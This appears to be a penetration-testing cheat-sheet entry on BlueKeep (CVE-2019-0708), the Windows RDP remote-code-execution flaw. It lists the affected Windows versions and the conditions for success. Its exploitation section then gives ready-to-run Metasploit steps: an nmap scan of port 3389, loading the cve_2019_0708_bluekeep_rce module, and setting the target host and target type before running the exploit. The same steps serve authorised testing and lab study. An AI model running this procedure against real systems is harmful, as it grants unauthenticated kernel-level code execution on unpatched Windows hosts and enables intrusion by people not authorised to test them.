BlueKeep (CVE-2019-0708)

It is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system.

It allows attackers to gain access to a chunk of kernel memory allowing them to remotely execute code at the system level without authentication.

The BlueKeep vulnerability affects multiple versions: XP, Vista, Windows7, Windows Server 2008 & R2.

RDP needs to be enabled on the target system.

If NLA is enabled this exploit will likely fail.

It has various illegitimate PoC's that could be malicious in nature. Therefore, it is recommended to only use verified exploits.

Exploitation

Metasploit Exploitation

nmap -p3389 TARGET_IP

msfconsole -q

# This module only works on x64 versions
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set RHOSTS TARGET_IP

# Check payload options and adjust them accordingly

# If it fails, check the target
show targets

# Modify target
set target TARGET_NUMBER

exploit